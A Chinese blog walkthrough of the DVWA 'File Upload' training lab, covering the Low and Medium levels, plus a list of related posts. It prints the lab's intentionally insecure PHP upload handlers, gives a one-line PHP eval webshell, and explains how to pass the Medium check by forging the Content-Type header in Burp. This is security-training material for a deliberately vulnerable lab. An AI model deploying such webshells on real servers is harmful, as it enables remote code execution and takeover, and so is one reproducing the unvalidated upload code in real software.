DVWA--File Upload(文件上传)(全难度)

最新推荐文章于 2024-09-15 22:26:42 发布
最新推荐文章于 2024-09-15 22:26:42 发布
阅读量2.2k 收藏 37
点赞数 3
分类专栏: DVWA 文章标签: DVWA 渗透测试 web安全 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/113890706
版权

DVWA–FIle Upload(文件上传)

逻辑

选择文件上传:

image-20210219163934499

难度分级

Low

核心代码
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>
分析

对上传文件没有做任何过滤与限制。将上传的文件直接在另一个目录保存。

basename()函数:返回带有文件扩展名的文件名部分。

例如:/xx/test.php,返回test.php

利用

直接上传一句话木马 yjh.php。

<?php @eval($_REQUEST['cmd']); ?>

上传成功:

image-20210219171006996

然后访问该路径。

image-20210219171032193

成功。

Medium

核心代码
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image? 判断是否为jpeg或png类型的图片
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
分析

  • [$_FILES’userfile’][‘name’]

    客户端机器文件的原名称。

  • [$_FILES’userfile’][‘type’]

    文件的 MIME 类型

  • [$_FILES’userfile’][‘size’]

    已上传文件的大小,单位为字节。

  • [$_FILES’userfile’][‘tmp_name’]

    文件被上传后在服务端储存的临时文件名。

  • [$_FILES’userfile’][‘error’]

    和该文件上传相关的错误代码。此项目是在PHP 4.2.0 版本中增加的。

    • UPLOAD_ERR_OK

      其值为 0,没有错误发生,文件上传成功。

    • UPLOAD_ERR_INI_SIZE

      其值为 1,上传的文件超过了 php.ini 中 upload_max_filesize 选项限制的值。

    • UPLOAD_ERR_FORM_SIZE

      其值为 2,上传文件的大小超过了 HTML 表单中 MAX_FILE_SIZE 选项指定的值。

    • UPLOAD_ERR_PARTIAL

      其值为 3,文件只有部分被上传。

    • UPLOAD_ERR_NO_FILE

      其值为 4,没有文件被上传。

    • UPLOAD_ERR_NO_TMP_DIR

      其值为 6,找不到临时文件夹。PHP 4.3.10 和 PHP 5.0.3 引进。

    • UPLOAD_ERR_CANT_WRITE

      其值为 7,文件写入失败。PHP 5.1.0 引进。

这里对上传的文件类型进行了判断,如果不是jpeg跟png类型的文件则无法上传。

利用

服务端这里判断文件的类型是通过$_FILES["file"]["type"]来判断的。

$_FILES["file"]["type"]是客户端请求数据包中的Content-Type的值。所以可以通过抓包工具修改Content-Type来绕过服务端检测

这里仍然使用上面的一句话木马。

通过bp抓包修改Content-Type字段的值为image/jpeg则成功上传文件。

image-20210219173144577

最低0.47元/天 解锁文章
wwxxee
关注
专栏目录
DVWA文件上传
qq_62078839的博客
04-03 3680
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA-File Upload/文件上传漏洞
jammny
11-22 1156
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
DVWA文件上传File Upload)四种级别分析
liweibin812的博客
01-15 5697
本文转自:https://www.freebuf.com/articles/web/119467.html File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 ...
DVWA】——File Upload文件上传
最新发布
HinsCoder的博客
09-15 613
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA-File Upload(文件上传)
简简的博客
02-02 507
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA--文件上传(初中高)
firecjh的博客
06-10 2399
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置。
DVWA-File Upload(High)
七月_的博客
10-23 1204
文章目录File Upload(High)代码分析 File Upload(High) 代码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $...
DVWAFile Upload文件上传
RexHa的博客
10-02 2799
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA-master.zip
03-13
2. 文件上传漏洞(File Upload Vulnerability):如果一个应用没有对用户上传的文件进行充分的验证和过滤,攻击者可能能够上传恶意文件,如Webshell,从而获得服务器的控制权。在DVWA中,你可以学习如何检测和利用...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
File Upload文件上传
kid的博客
04-19 1万+
File Upload 前言 文件上传漏洞:攻击者上传了一个可执行的脚本文件,通过此脚本文件获得了执行服务器端命令的功能。文件上传是否会产生漏洞关键在于服务器怎么来处理,怎么来解析这个文件。如果说服务器处理的模式不够安全,那么就会导致严重的后果,也就是上传了恶意的可执行文件以后,服务器端对此文件进行执行 文件上传漏洞需要对一句话木马,以及菜刀的使用有所了解。 练习 Low 文件上传我们直接先尝...
DVWA-文件上传
Xiayuyuren_Study的博客
06-05 6117
概述 文件上传漏洞是指服务器对于用户上传的部分控制不严格导致攻击者可上传一个恶意的可执行文件至服务器,简单点就是用户直接或通过各种绕过方式将webshell上传至服务器进而执行利用 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 Apache的文件解析漏洞,比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,Apache有自己...
DVWA(文件上传)
weixin_44023403的博客
12-06 436
DVWA文件上传文件上传File Upload)LowMedium 文件上传File Upload文件上传介绍: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 文件上传漏洞的利用的条件: 1.能够成功上传木马文件; 2.上传文件必须能够被执行; 3.上传文件的路径必须可知. Low 源码: <?php if( isset( $_POST[ 'Upload'
DVWA文件上传File Upload
qq_39682037的博客
03-21 2625
文件上传File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA-文件上传File Upload
weixin_58954236的博客
08-20 856
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA---文件上传
孤的博客
11-20 482
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA——文件上传
m0_74426634的博客
04-07 1076
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击、命令执行等,用户可以通过对这些漏洞进行测试和攻击来提高自己的网络安全意识和技能。 dvwa-master zip的安装非常简便,只需将其解压到服务器的Web目录下,并配置好数据库连接信息即可。一旦安装完成,用户就可以通过浏览器访问dvwa-master zip的前端界面,并开始进行安全测试和漏洞扫描。 dvwa-master zip提供了多个不同的安全级别,从易到难,供用户选择。在低级别中,漏洞和脆弱性的例子会更为简单和明显;而在高级别中,这些漏洞将会更加难以察觉和利用,需要用户具备更高的技术水平。 通过dvwa-master zip,用户可以模拟和测试真实的网络安全风险,学习如何防范和修复相关漏洞。它对于安全工程师、渗透测试人员、Web开发人员等具有较高的教育和培训价值。值得注意的是,dvwa-master zip仅用于合法的安全研究和学习目的,未经授权的攻击行为是不被允许的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值